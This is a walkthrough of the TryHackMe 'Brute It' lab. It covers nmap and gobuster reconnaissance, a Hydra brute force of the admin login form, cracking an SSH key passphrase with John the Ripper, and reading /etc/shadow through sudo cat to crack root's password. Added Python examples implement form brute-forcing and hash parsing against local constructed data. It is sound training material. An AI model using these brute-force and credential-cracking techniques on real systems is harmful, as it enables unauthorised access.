TryHackMe | Brute It Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll solve the “Brute It” room on TryHackMe together. In some sections I’ll give a brief background on the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
-Reconnaissance
-Brute Force
-Hash Cracking
-Privilege Escalation
Deploy the machine
Connect to the TryHackMe network, and deploy the machine.
Step 1: You need the OpenVPN configuration file from your TryHackMe profile to reach the machines over the VPN.
Step 2: Start the VPN connection with the openvpn command and that configuration file.
Step 3: Can you see the IP address of the machine on the room page?
Step 4: Check your connection, for example by pinging the machine’s IP address before scanning it.
Reconnaissance
Before attacking, let’s get information about the target.
Answer the questions below
Q1: Search for open ports using nmap. How many ports are open?
A1: 2
First, we need to run an nmap scan to find out which ports are open and which services are running on them.
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing.
nmap -A -T4 -O -p- 10.10.145.133
-A : Enable OS detection, version detection, script scanning and traceroute.
-T4 : Set the timing template (higher is faster, and noisier).
-O : Enable OS detection. This is redundant here, since -A already enables it.
-p- : Scan all ports from 1 through 65535. Combining -p- with -A is slow on a full port range; a quicker approach is a plain -p- scan first, then -A only against the ports it reports open. Here that gives two open ports: 22 (SSH) and 80 (HTTP).
Q2: What version of SSH is running?
A2: OpenSSH 7.6p1
The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another.
OpenSSH is an open-source implementation of the SSH protocol. It is based on the free version by Tatu Ylonen and further developed by the OpenBSD team and the user community.
Q3: What version of Apache is running?
A3: 2.4.29
Apache HTTP Server is free and open-source web server software maintained by the Apache Software Foundation. First released in 1995, it is one of the oldest and most widely deployed web servers. The version string it advertises (here 2.4.29) is the first thing to check against known vulnerabilities, and it also hints at the distribution, since 2.4.29 is the package version shipped with Ubuntu 18.04.
Q4: Which Linux distribution is running?
A4: Ubuntu
Q5: Search for hidden directories on web server. What is the hidden directory?
A5: /admin
We can use the gobuster tool to find hidden directories.
Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains.
gobuster dir -u http://10.10.145.133/ -w <wordlist>
dir : Uses directory/file enumeration mode.
-u : The target URL (scheme, host and base path) whose hidden directories and files we want to enumerate.
-w : Path to the wordlist, for example one of the dirb or dirbuster lists shipped with Kali. Gobuster reports a path when the server answers with something other than 404, so also watch for sites that return 200 for every path, which floods the output with false positives.
Let’s check the page source for more information about the web page.
The page source can give us important information. It is the raw HTML the server sent, before the browser renders it; developer comments, hidden form fields and script references never show up on the rendered page, but they are all visible here. That is why you should never forget to look at it.
There appears to be a username left in the source that we can use for the admin page.
Getting a Shell
Find a form to get a shell on SSH.
Answer the questions below
Q1: What is the user:password of the admin panel?
A1: ************
When we try a default username and password, we get the following error message. You’re right, it can’t be that easy.
By looking at the request in the browser’s developer tools, we can see that the website is using the POST method to log in.
POST is the HTTP method designed to send data to the server in the request body; most HTML login forms on the web use it.
The Request payload section contains the username and password fields we entered. Hydra needs the path, the parameter names and the field layout exactly as the form sends them.
Finally, we need a way to let Hydra know whether or not a login succeeded. Since we can’t see what the page looks like after a successful login, we specify the string the page shows on a failed login; Hydra then treats any response that does not contain that string as a success. One caveat: if the site starts returning a different error (rate limiting, a lockout page, a 500), that response also lacks the failure string and shows up as a false positive, so always confirm a reported hit by hand.
Hydra is a parallelized login cracker which supports numerous protocols to attack.
hydra -l <Login_Name> -P <wordlist> 10.10.145.133 http-post-form '/admin/:user=^USER^&pass=^PASS^:Username or password invalid'
-l : Log in with this single LOGIN name (use -L to load a list of users instead).
-P : Load passwords from the given wordlist FILE.
[machine IP] : The IP address of the target machine.
http-post-form : The Hydra module for POST login forms. Its argument has three colon-separated parts: the path, the form body with ^USER^ and ^PASS^ as placeholders, and the failure string to look for in the response.
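To make the two brute-force steps above concrete (gobuster’s directory enumeration and Hydra’s http-post-form check), here is an added example that is not part of the original walkthrough and not code from either tool. It starts a throwaway local web server so it runs offline; the hidden path, the valid credential, the failure string and both wordlists are constructed for the demo, and the function names are mine.

```python
"""Directory enumeration and POST-form password guessing against a throwaway
local web server, illustrating what gobuster and Hydra's http-post-form module
do. Added example: the site, the credential and the wordlists are constructed."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USER, VALID_PASS = "admin", "sunshine"         # constructed credential
FAIL_STRING = "Username or password invalid"          # text the login form returns on failure
KNOWN_PATHS = {"/", "/admin", "/admin/"}              # constructed site layout


class FakeSite(BaseHTTPRequestHandler):
    def _reply(self, code, body):
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        # Unknown paths answer 404; that status difference is what gobuster keys on.
        if self.path in KNOWN_PATHS:
            self._reply(200, b"<form method='POST'><input name='user'><input name='pass'></form>")
        else:
            self._reply(404, b"Not Found")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        pwd = form.get("pass", [""])[0]
        if self.path == "/admin/" and (user, pwd) == (VALID_USER, VALID_PASS):
            self._reply(200, b"<h1>Welcome to the admin panel</h1>")
        else:
            self._reply(200, FAIL_STRING.encode())    # failed logins still return HTTP 200

    def log_message(self, *args):                     # keep the demo server quiet
        pass


def start_server():
    """Serve the fake site on an ephemeral localhost port in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), FakeSite)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def status_of(url):
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def dir_bruteforce(base_url, wordlist):
    """gobuster dir logic: request each candidate and keep the ones not answering 404."""
    return [w for w in wordlist if status_of(f"{base_url}/{w}") != 404]


def post_form_bruteforce(url, user, wordlist, fail_string=FAIL_STRING):
    """Hydra http-post-form logic: success is any response lacking the failure string."""
    for candidate in wordlist:
        data = urllib.parse.urlencode({"user": user, "pass": candidate}).encode()
        with urllib.request.urlopen(url, data=data, timeout=5) as resp:
            if fail_string not in resp.read().decode():
                return candidate
    return None


DIR_WORDS = ["images", "admin", "backup", "login"]                    # constructed wordlist
PASS_WORDS = ["123456", "password", "admin", "sunshine", "letmein"]   # constructed wordlist

if __name__ == "__main__":
    server = start_server()
    base = f"http://127.0.0.1:{server.server_port}"
    print("directories:", dir_bruteforce(base, DIR_WORDS))
    print("password:", post_form_bruteforce(base + "/admin/", "admin", PASS_WORDS))
    server.shutdown()
```

Note how the login check works: a failed guess still comes back with HTTP 200, so the status code is useless and only the page body distinguishes success from failure. That is exactly why the third part of Hydra’s http-post-form argument (the failure string) has to be copied from a real failed attempt.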
Q2: Crack the RSA key you found. What is John’s RSA Private Key passphrase?
A2: **********
Do you remember which ports were open in the nmap scan? SSH was listening on port 22, so perhaps the private key we found will let us log in as John.
An SSH key pair consists of a public key, which the server keeps in the user’s authorized_keys file, and a private key, which the client uses to prove its identity during authentication. A private key stored on disk may be protected by a passphrase; that passphrase encrypts the key file, and it is what we need to crack before the key can be used.
We can use the wget command to download the key to our machine.
Wget is a command-line utility for downloading files from the web.
We can use the ssh2john.py script that ships with John the Ripper to extract a crackable hash from the private key.
ssh2john is part of the John the Ripper suite. It reads an RSA/DSA/EC/OpenSSH private key, pulls out the cipher, KDF parameters and encrypted blob, and writes them in John’s hash format for later cracking. If the key is not passphrase-protected, ssh2john will tell you so, and there is nothing to crack.
Now we can run John the Ripper with a wordlist against that hash and recover the passphrase.
John the Ripper is a popular open source password cracker that supports many hash formats and runs in wordlist (dictionary), rule-based and incremental (brute force) modes.
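To show what ssh2john actually pulls out of a key before John can go to work, here is an added example that is not part of the original walkthrough and not ssh2john’s own code. It reads the encryption parameters from both private key formats you will meet in the wild: the newer openssh-key-v1 container and the legacy OpenSSL PEM with Proc-Type/DEK-Info headers. The two sample keys are constructed inside the block (dummy key material, not real keys), and the helper names are mine.

```python
"""Read the encryption parameters out of an SSH private key, the first step a
cracker needs before testing passphrases. Added example: both sample keys are
constructed here with dummy key material and are not real keys."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _sshstr(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def build_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", salt=b"\x01" * 16, rounds=16) -> str:
    """Constructed openssh-key-v1 container with dummy key material (demo input only)."""
    kdfoptions = _sshstr(salt) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (OPENSSH_MAGIC + _sshstr(cipher) + _sshstr(kdf) + _sshstr(kdfoptions)
            + struct.pack(">I", 1) + _sshstr(b"dummy-public") + _sshstr(b"\xaa" * 64))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM key; OpenSSL marks encryption with these two headers.
LEGACY_ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def _parse_openssh(pem: str) -> dict:
    body = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    pos = len(OPENSSH_MAGIC)

    def read_str():
        nonlocal pos
        (n,) = struct.unpack_from(">I", blob, pos)
        pos += 4
        value = blob[pos:pos + n]
        pos += n
        return value

    cipher, kdf, kdfopts = read_str().decode(), read_str().decode(), read_str()
    info = {"format": "openssh-key-v1", "cipher": cipher, "kdf": kdf, "encrypted": cipher != "none"}
    if kdf == "bcrypt":
        # kdfoptions = string salt, uint32 rounds; rounds sets the per-guess cost.
        (slen,) = struct.unpack_from(">I", kdfopts, 0)
        info["salt"] = kdfopts[4:4 + slen].hex()
        (info["rounds"],) = struct.unpack_from(">I", kdfopts, 4 + slen)
    return info


def _parse_legacy_pem(pem: str) -> dict:
    headers = dict(line.split(": ", 1) for line in pem.splitlines() if ": " in line)
    if headers.get("Proc-Type") != "4,ENCRYPTED":
        return {"format": "pem", "encrypted": False}
    cipher, iv = headers["DEK-Info"].split(",")
    # OpenSSL derives the key with a single MD5 over passphrase + first 8 IV bytes (EVP_BytesToKey).
    return {"format": "pem", "cipher": cipher, "kdf": "EVP_BytesToKey-MD5",
            "salt": iv[:16].lower(), "encrypted": True}


def key_crack_parameters(pem: str) -> dict:
    """Dispatch on the PEM label and report what a cracker needs for each guess."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        return _parse_openssh(pem)
    return _parse_legacy_pem(pem)


if __name__ == "__main__":
    print(key_crack_parameters(build_openssh_key()))
    print(key_crack_parameters(LEGACY_ENCRYPTED_PEM))
```

The practical lesson is in the kdf field. A legacy PEM key costs one MD5 per guess, so a wordlist attack finishes in seconds, whereas an openssh-key-v1 key uses bcrypt_pbkdf with the stored number of rounds (16 by default), which makes each guess orders of magnitude more expensive. Check this before committing to a large wordlist.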
Q3: user.txt
A3: ********************************
Now we can log in over SSH using the private key with the -i option and the cracked passphrase. Remember to restrict the downloaded key file’s permissions to 600 first; the SSH client refuses to use a private key that is readable by other users.
Congratulations! You found the first flag.
Q4: Web flag
A4: ************************
Congratulations! You found the second flag.
Privilege Escalation
Now, we need to escalate our privileges.
Answer the questions below
Q1: Find a form to escalate your privileges. What is the root’s password?
A1: ********
sudo (“superuser do”) is the Linux command used as a prefix to run a command with another user’s privileges, usually root, according to the rules in /etc/sudoers.
sudo -l : The -l (list) option prints the commands the invoking user is allowed (and forbidden) to run on the current host, and whether a password is required. This is the first check to make on any foothold.
Google search time!
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. If sudo -l shows that a file-reading utility such as cat may be run as root, the GTFOBins entry for cat shows that this is enough to read any file on the system, including /etc/shadow.
The shadow password file, /etc/shadow, is the Linux system file that stores each account’s hashed password (not an encrypted one), along with password ageing information. It is readable only by root and the shadow group, so that ordinary users cannot copy the hashes and crack them offline. Being able to read it as a low-privileged user is therefore a serious misconfiguration.
This time we copy the root user’s line from /etc/shadow into a file and crack its hash with John the Ripper and a wordlist.
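Before feeding shadow entries to John it helps to know which accounts actually carry a crackable hash and which algorithm produced it; this is what John’s unshadow helper prepares. The following is an added example, not part of the original walkthrough and not John’s own code: it parses constructed /etc/passwd and /etc/shadow samples (the hash strings are placeholders in the right shape, not real hashes from the room), merges them the way unshadow does, and names the crypt algorithm from the $id$ prefix. Function names are mine.

```python
"""Parse /etc/passwd and /etc/shadow, merge them the way John's unshadow
helper does, and report which accounts carry a crackable hash and of which
type. Added example over constructed sample lines; hashes are placeholders."""

# Constructed inputs. Shadow hash fields follow $<id>$<salt>$<hash> (modular crypt format).
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:John,,,:/home/john:/bin/bash
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""
SHADOW_SAMPLE = """root:$6$AbCdEf12$fakeRootHashConstructed0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ:18900:0:99999:7:::
john:$y$j9T$Q2R5tF8w$fakeYescryptHashConstructedAbc123:18900:0:99999:7:::
sshd:*:18900:0:99999:7:::
backup:!:18900:0:99999:7:::
"""

# $id$ prefixes used by glibc/libxcrypt; $y$ is the default on recent Ubuntu releases.
CRYPT_IDS = {"1": "md5crypt", "2b": "bcrypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def parse_shadow(text: str) -> dict:
    """Return {user: hash_field}; every shadow line has nine colon-separated fields."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries[fields[0]] = fields[1]
    return entries


def classify_hash(hash_field: str) -> str:
    """Name the crypt algorithm, or say why the entry cannot be cracked."""
    if hash_field in ("", "*") or hash_field.startswith("!"):
        return "locked/no-password"          # '*' and '!' mean no valid password login
    if not hash_field.startswith("$"):
        return "descrypt"                    # legacy 13-character DES crypt, no $id$ prefix
    crypt_id = hash_field.split("$")[1]
    return CRYPT_IDS.get(crypt_id, f"unknown(${crypt_id}$)")


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Replace the 'x' placeholder in passwd with the real hash, like `unshadow passwd shadow`."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable_accounts(shadow_text: str) -> dict:
    """Map each user that has a real hash to its algorithm; locked accounts are skipped."""
    return {user: classify_hash(h) for user, h in parse_shadow(shadow_text).items()
            if classify_hash(h) != "locked/no-password"}


if __name__ == "__main__":
    print("\n".join(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)))
    print(crackable_accounts(SHADOW_SAMPLE))
```

Two things worth checking in the output: only accounts with a real $id$ hash are worth John’s time, and the id tells you which format to expect. A $6$ (sha512crypt) hash is handled by any John build, but $y$ (yescrypt) hashes need a recent jumbo build or the --format=crypt fallback, so if John reports no loadable hashes, the algorithm rather than the wordlist is the first thing to suspect.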
Q2: root.txt
A2: *************************
su stands for “substitute user” (often read as “switch user”). It switches the current session to another account, and you need that account’s password to do so. Most often the target is root, but it can be any account on the system; with the cracked password, su alone gives us a root shell.
Congratulations! You found the third flag.
Thank you for your time. See you soon! Until then... Happy Hacking ❤
Resources:
https://www.ssh.com/academy/ssh/openssh
https://www.kali.org/tools/gobuster
https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra
https://rapidapi.com/blog/api-glossary/post
https://www.kali.org/tools/hydra
https://www.techtarget.com/whatis/definition/John-the-Ripper
https://www.geeksforgeeks.org/sudo-command-in-linux-with-examples
https://gtfobins.github.io/gtfobins/cat/#sudo
https://www.techtarget.com/searchsecurity/definition/shadow-password-file